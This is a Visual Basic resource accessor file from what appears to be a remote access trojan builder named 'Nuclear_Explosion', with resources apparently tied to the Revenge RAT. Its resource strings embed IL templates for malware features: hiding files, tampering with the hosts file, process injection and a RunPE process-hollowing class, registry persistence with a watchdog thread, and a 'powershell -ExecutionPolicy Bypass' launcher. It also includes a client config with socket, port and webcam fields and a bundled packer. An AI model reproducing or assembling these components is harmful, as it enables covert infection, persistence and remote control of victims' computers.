            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Gray() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Gray", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0119:  nop
        '''      IL_011a:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_011f:  ldc.i4.6
        '''      IL_0120:  call       void [mscorlib]System.IO.File::SetAttributes(string,
        '''                                                                        valuetype [mscorlib]System.IO.FileAttributes)
        '''      IL_0125:  nop
        '''      IL_0126:  leave.s    IL_0135
        '''
        '''    }  // end .try
        '''    catch [mscorlib]System.Exception 
        '''    {
        '''      IL_0128:  call       void [Microsoft.VisualBasic]Microso [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property HideFile() As String
            Get
                Return ResourceManager.GetString("HideFile", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0137:  nop
        '''      IL_0138:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_013d:  ldc.i4.6
        '''      IL_013e:  call       void [mscorlib]System.IO.File::SetAttributes(string,
        '''                                                                        valuetype [mscorlib]System.IO.FileAttributes)
        '''      IL_0143:  nop
        '''      IL_0144:  leave      IL_0159
        '''
        '''    }  // end .try
        '''    catch [mscorlib]System.Exception 
        '''    {
        '''      IL_0149:  call       void [Microsoft.VisualBasic]Microso [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property HideFileUSB() As String
            Get
                Return ResourceManager.GetString("HideFileUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_04f0:  nop
        '''      IL_04f1:  ldstr      &quot;%IP%&quot;
        '''      IL_04f6:  ldstr      &quot;|&quot;
        '''      IL_04fb:  ldc.i4.m1
        '''      IL_04fc:  ldc.i4.0
        '''      IL_04fd:  call       string[] [Microsoft.VisualBasic]Microsoft.VisualBasic.Strings::Split(string,
        '''                                                                                                string,
        '''                                                                                                int32,
        '''                                             [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property HostsFile() As String
            Get
                Return ResourceManager.GetString("HostsFile", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0566:  nop
        '''      IL_0567:  ldstr      &quot;%IP%&quot;
        '''      IL_056c:  ldstr      &quot;|&quot;
        '''      IL_0571:  ldc.i4.m1
        '''      IL_0572:  ldc.i4.0
        '''      IL_0573:  call       string[] [Microsoft.VisualBasic]Microsoft.VisualBasic.Strings::Split(string,
        '''                                                                                                string,
        '''                                                                                                int32,
        '''                                             [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property HostsFileUSB() As String
            Get
                Return ResourceManager.GetString("HostsFileUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;!DOCTYPE html&gt;
        '''&lt;html&gt;
        '''&lt;head&gt;
        '''&lt;style&gt;
        '''.alert {
        '''    padding: 20px;
        '''    background-color: #4a96ba;
        '''    color: white;
        '''}
        '''
        '''.closebtn {
        '''    margin-left: 15px;
        '''    color: white;
        '''    font-weight: bold;
        '''    float: right;
        '''    font-size: 22px;
        '''    line-height: 20px;
        '''    cursor: pointer;
        '''    transition: 0.3s;
        '''}
        '''
        '''.closebtn:hover {
        '''    color: black;
        '''}
        '''&lt;/style&gt;
        '''&lt;/head&gt;
        '''&lt;body&gt;
        '''&lt;div class=&quot;alert&quot;&gt;
        '''  &lt;span class=&quot;closebtn&quot; onclick=&quot;this.parentElement.style.display=&apos;none&apos;;&quot;&gt;&amp;times;&lt;/span&gt;
        '''  &lt;stron [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property HTML() As String
            Get
                Return ResourceManager.GetString("HTML", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        '''</summary>
        Friend ReadOnly Property icon() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("icon", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to 1 VERSIONINFO
        '''FILEVERSION %UPFV%
        '''PRODUCTVERSION %UPPR%
        '''FILEOS 0x40004
        '''FILETYPE 0x1
        '''{
        '''BLOCK &quot;StringFileInfo&quot;
        '''{
        '''	BLOCK &quot;040904b0&quot;
        '''	{
        '''		VALUE &quot;CompanyName&quot;, &quot;%Company%&quot;
        '''		VALUE &quot;FileDescription&quot;, &quot;%Description%&quot;
        '''		VALUE &quot;FileVersion&quot;, &quot;%Filever%&quot;
        '''		VALUE &quot;InternalName&quot;, &quot;%Title%.exe&quot;
        '''		VALUE &quot;LegalCopyright&quot;, &quot;%CopyRights%&quot;
        '''		VALUE &quot;OriginalFilename&quot;, &quot;%Title%.exe&quot;
        '''		VALUE &quot;LegalTrademarks&quot;, &quot;%Trade%&quot; 
        '''		VALUE &quot;ProductName&quot;, &quot;%Product%&quot;
        '''		VALUE &quot;ProductVersion&quot;, &quot;%Prover%&quot;
        '''		}
        '''}
        '''
        '''BLOCK &quot;V [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property info() As String
            Get
                Return ResourceManager.GetString("info", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0032:  nop
        '''      IL_0033:  ldstr      &quot;WINDIR&quot;
        '''      IL_0038:  call       string [mscorlib]System.Environment::GetEnvironmentVariable(string)
        '''      IL_003d:  ldstr      &quot;\\Microsoft.NET\\Framework\\%IV%\\%PI%&quot;
        '''      IL_0042:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_0047:  stloc.0
        '''      IL_0048:  call       class [System]System.Diagnostics.Process [System]System.Diagnostics.Proces [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property InjectCall() As String
            Get
                Return ResourceManager.GetString("InjectCall", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0038:  nop
        '''      IL_0039:  ldstr      &quot;WINDIR&quot;
        '''      IL_003e:  call       string [mscorlib]System.Environment::GetEnvironmentVariable(string)
        '''      IL_0043:  ldstr      &quot;\\Microsoft.NET\\Framework\\%IV%\\%PI%&quot;
        '''      IL_0048:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_004d:  stloc.0
        '''      IL_004e:  call       class [System]System.Diagnostics.Process [System]System.Diagnostics.Proces [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property InjectCallUSB() As String
            Get
                Return ResourceManager.GetString("InjectCallUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Light_Sea_Green() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Light_Sea_Green", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Loading() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Loading", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property mpress() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("mpress", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Night_Fury() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Night_Fury", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property P() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("P", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_03f2:  nop
        '''      IL_03f3:  ldstr      &quot;powershell -ExecutionPolicy Bypass -Command %PSC%&quot;
        '''      IL_03f8:  ldc.i4.2
        '''      IL_03f9:  ldc.i4.0
        '''      IL_03fa:  ldc.i4.m1
        '''      IL_03fb:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.Interaction::Shell(string,
        '''                                                                                                 valuetype [Microsoft.VisualBasic]Microsoft.VisualBasic.AppWinStyle,
        '''                                                [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property PowerShell() As String
            Get
                Return ResourceManager.GetString("PowerShell", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0443:  nop
        '''      IL_0444:  ldstr      &quot;powershell -ExecutionPolicy Bypass -Command %PSC%&quot;
        '''      IL_0449:  ldc.i4.2
        '''      IL_044a:  ldc.i4.0
        '''      IL_044b:  ldc.i4.m1
        '''      IL_044c:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.Interaction::Shell(string,
        '''                                                                                                 valuetype [Microsoft.VisualBasic]Microsoft.VisualBasic.AppWinStyle,
        '''                                                [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property PowerShellUSB() As String
            Get
                Return ResourceManager.GetString("PowerShellUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0001:  nop
        '''      IL_0002:  call       class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::GetCurrentProcess()
        '''      IL_0007:  ldstr      &quot;%PC%&quot;
        '''      IL_000c:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_0011:  callvirt   instance void [System]System.Diagnostics.Process::set_PriorityClass(valuetype [System]System.Diagnostics.ProcessPriorityClass)
        '''      IL_0016:  nop
        '''      IL_0017:  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ProcessPro() As String
            Get
                Return ResourceManager.GetString("ProcessPro", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0001:  nop
        '''      IL_0002:  call       class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::GetCurrentProcess()
        '''      IL_0007:  ldstr      &quot;%PC%&quot;
        '''      IL_000c:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_0011:  callvirt   instance void [System]System.Diagnostics.Process::set_PriorityClass(valuetype [System]System.Diagnostics.ProcessPriorityClass)
        '''      IL_0016:  nop
        '''      IL_0017:  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ProcessProUSB() As String
            Get
                Return ResourceManager.GetString("ProcessProUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property PU() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("PU", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_039d:  nop
        '''      IL_039e:  ldarg.0
        '''      IL_039f:  ldstr      &quot;%RGP%&quot;
        '''      IL_03a4:  ldstr      &quot;%REGV%&quot;
        '''      IL_03a9:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_03ae:  call       instance object Nuclear_Explosion.Atomic::IR(string,
        '''                                                                        string,
        '''                                                                        string)
        '''      IL_03b3:  pop
        '''      IL_03b4:  leave.s    IL_03c3
        '''
        '''    }  // end [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Registry() As String
            Get
                Return ResourceManager.GetString("Registry", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_05d9:  nop
        '''      IL_05da:  ldarg.0
        '''      IL_05db:  ldftn      instance void Nuclear_Explosion.Atomic::RGPR()
        '''      IL_05e1:  newobj     instance void [mscorlib]System.Threading.ThreadStart::.ctor(object,
        '''                                                                                       native int)
        '''      IL_05e6:  newobj     instance void [mscorlib]System.Threading.Thread::.ctor(class [mscorlib]System.Threading.ThreadStart)
        '''      IL_05eb:  stloc.s    V_15
        '''      IL_05ed:  ldlo [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RegistryCall() As String
            Get
                Return ResourceManager.GetString("RegistryCall", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_066f:  nop
        '''      IL_0670:  ldarg.0
        '''      IL_0671:  ldftn      instance void Nuclear_Explosion.Atomic::RGPR()
        '''      IL_0677:  newobj     instance void [mscorlib]System.Threading.ThreadStart::.ctor(object,
        '''                                                                                       native int)
        '''      IL_067c:  newobj     instance void [mscorlib]System.Threading.Thread::.ctor(class [mscorlib]System.Threading.ThreadStart)
        '''      IL_0681:  stloc.s    V_15
        '''      IL_0683:  ldlo [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RegistryCallUSB() As String
            Get
                Return ResourceManager.GetString("RegistryCallUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .method public instance void  RGPR() cil managed
        '''  {
        '''    // Code size       127 (0x7f)
        '''    .maxstack  4
        '''    .locals init (bool V_0,
        '''             bool V_1)
        '''    IL_0000:  nop
        '''    IL_0001:  nop
        '''    IL_0002:  ldc.i4     0x2710
        '''    IL_0007:  call       void [mscorlib]System.Threading.Thread::Sleep(int32)
        '''    IL_000c:  nop
        '''    IL_000d:  ldstr      &quot;%RGP%&quot;
        '''    IL_0012:  ldstr      &quot;%REGV%&quot;
        '''    IL_0017:  ldnull
        '''    IL_0018:  call       object [mscorlib]Microsoft.Win32.Registry::GetValue(string,
        '''      [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RegistryMethod() As String
            Get
                Return ResourceManager.GetString("RegistryMethod", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .method public instance void  RGPR() cil managed
        '''  {
        '''    // Code size       136 (0x88)
        '''    .maxstack  6
        '''    .locals init (bool V_0,
        '''             bool V_1)
        '''    IL_0000:  nop
        '''    IL_0001:  nop
        '''    IL_0002:  ldc.i4     0x2710
        '''    IL_0007:  call       void [mscorlib]System.Threading.Thread::Sleep(int32)
        '''    IL_000c:  nop
        '''    IL_000d:  ldstr      &quot;%RGP%&quot;
        '''    IL_0012:  ldstr      &quot;%REGV%&quot;
        '''    IL_0017:  ldnull
        '''    IL_0018:  call       object [mscorlib]Microsoft.Win32.Registry::GetValue(string,
        '''      [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RegistryMethodUSB() As String
            Get
                Return ResourceManager.GetString("RegistryMethodUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_03e2:  nop
        '''      IL_03e3:  ldarg.0
        '''      IL_03e4:  ldstr      &quot;%RGP%&quot;
        '''      IL_03e9:  ldstr      &quot;%REGV%&quot;
        '''      IL_03ee:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_03f3:  call       instance object Nuclear_Explosion.Atomic::IR(string,
        '''                                                                        string,
        '''                                                                        string)
        '''      IL_03f8:  pop
        '''      IL_03f9:  leave      IL_040e
        '''
        '''    }  // end [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RegistryUSB() As String
            Get
                Return ResourceManager.GetString("RegistryUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property Resource_Hacker() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("Resource_Hacker", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;Rev&gt;
        '''&lt;Socket_Key&gt;
        '''&lt;![CDATA[%S%]]&gt;
        '''&lt;/Socket_Key&gt;
        '''&lt;Connections_Port&gt;
        '''&lt;![CDATA[%P%]]&gt;
        '''&lt;/Connections_Port&gt;
        '''&lt;Minimizing&gt;
        '''&lt;![CDATA[%M%]]&gt;
        '''&lt;/Minimizing&gt;
        '''&lt;Listening&gt;
        '''&lt;![CDATA[%L%]]&gt;
        '''&lt;/Listening&gt;
        '''&lt;Ping&gt;
        '''&lt;![CDATA[%T%]]&gt;
        '''&lt;/Ping&gt;
        '''&lt;Visual&gt;
        '''&lt;![CDATA[%V%]]&gt;
        '''&lt;/Visual&gt;
        '''&lt;Notification&gt;
        '''&lt;![CDATA[%N%]]&gt;
        '''&lt;/Notification&gt;
        '''&lt;Sound&gt;
        '''&lt;![CDATA[%SN%]]&gt;
        '''&lt;/Sound&gt;
        '''&lt;Desktop&gt;
        '''&lt;![CDATA[%D%]]&gt;
        '''&lt;/Desktop&gt;
        '''&lt;DesktopValue&gt;
        '''&lt;![CDATA[%DV%]]&gt;
        '''&lt;/DesktopValue&gt;
        '''&lt;Webcam&gt;
        '''&lt;![CDATA[%W [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Revenge() As String
            Get
                Return ResourceManager.GetString("Revenge", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1476116434_bullet_green() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1476116434_bullet_green", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1476116499_bullet_red() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1476116499_bullet_red", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1476172385_bullet_white() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1476172385_bullet_white", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1476172388_bullet_orange() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1476172388_bullet_orange", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1481030093_chrome_512() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1481030093_chrome_512", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1481030174_pidgin() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1481030174_pidgin", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1481030189_filezilla() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1481030189_filezilla", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1481030222_firefox() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1481030222_firefox", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_1481030243_ip_block() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_1481030243_ip_block", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_filehistory_162() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_filehistory_162", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_109() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_109", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_110() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_110", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_112() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_112", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_115() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_115", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_184() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_184", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_33() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_33", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_35() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_35", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_36() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_36", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_37() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_37", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_4() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_4", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_58() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_58", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_imageres_75() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_imageres_75", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_shell32_37219() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_shell32_37219", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_shell32_51380() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_shell32_51380", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property rsz_thumb_14378800210shortcut_arrow() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("rsz_thumb_14378800210shortcut_arrow", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to IL_0137:  call       class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::Start(string)
        '''      IL_013c:  pop
        '''      IL_013d:  call       void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::EndApp()
        '''      IL_0142:  nop.
        '''</summary>
        Friend ReadOnly Property RUNF() As String
            Get
                Return ResourceManager.GetString("RUNF", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to IL_0158:  call       class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::Start(string)
        '''      IL_015d:  pop
        '''      IL_015e:  call       void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::EndApp()
        '''      IL_0163:  nop.
        '''</summary>
        Friend ReadOnly Property RUNFUSB() As String
            Get
                Return ResourceManager.GetString("RUNFUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .class private auto ansi Nuclear_Explosion.RunPE
        '''       extends [mscorlib]System.Object
        '''{
        '''  .class sequential ansi sealed nested private Process_INFORMATION
        '''         extends [mscorlib]System.ValueType
        '''  {
        '''    .pack 1
        '''    .size 0
        '''    .field public native int ProcessHandle
        '''    .field public native int ThreadHandle
        '''    .field public uint32 ProcessId
        '''    .field public uint32 ThreadId
        '''  } // end of class Process_INFORMATION
        '''
        '''  .class sequential ansi sealed nested private STARTUP_INFORMATION
        '''       [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RunPEClass() As String
            Get
                Return ResourceManager.GetString("RunPEClass", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .class private auto ansi Nuclear_Explosion.RunPE
        '''       extends [mscorlib]System.Object
        '''{
        '''  .class sequential ansi sealed nested private Process_INFORMATION
        '''         extends [mscorlib]System.ValueType
        '''  {
        '''    .pack 1
        '''    .size 0
        '''    .field public native int ProcessHandle
        '''    .field public native int ThreadHandle
        '''    .field public uint32 ProcessId
        '''    .field public uint32 ThreadId
        '''  } // end of class Process_INFORMATION
        '''
        '''  .class sequential ansi sealed nested private STARTUP_INFORMATION
        '''       [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RunPEClassUSB() As String
            Get
                Return ResourceManager.GetString("RunPEClassUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to //  Microsoft (R) .NET Framework IL Disassembler.  Version 4.6.1055.0
        '''//  Copyright (c) Microsoft Corporation.  All rights reserved.
        '''
        '''
        '''
        '''// Metadata version: v2.0.50727
        '''.module extern kernel32
        '''.module extern user32
        '''.module extern avicap32.dll
        '''.module extern psapi
        '''.module extern kernel32.dll
        '''.module extern ntdll.dll
        '''.module extern gdi32.dll
        '''.module extern user32.dll
        '''.module extern shell32.dll
        '''.assembly extern mscorlib
        '''{
        '''  .publickeytoken = (B7 7A 5C 56 19 34 E0 89 )                         // [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RV() As String
            Get
                Return ResourceManager.GetString("RV", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_022e:  nop
        '''      IL_022f:  ldstr      &quot;WScript.Shell&quot;
        '''      IL_0234:  ldstr      &quot;&quot;
        '''      IL_0239:  call       object [Microsoft.VisualBasic]Microsoft.VisualBasic.Interaction::CreateObject(string,
        '''                                                                                                         string)
        '''      IL_023e:  ldnull
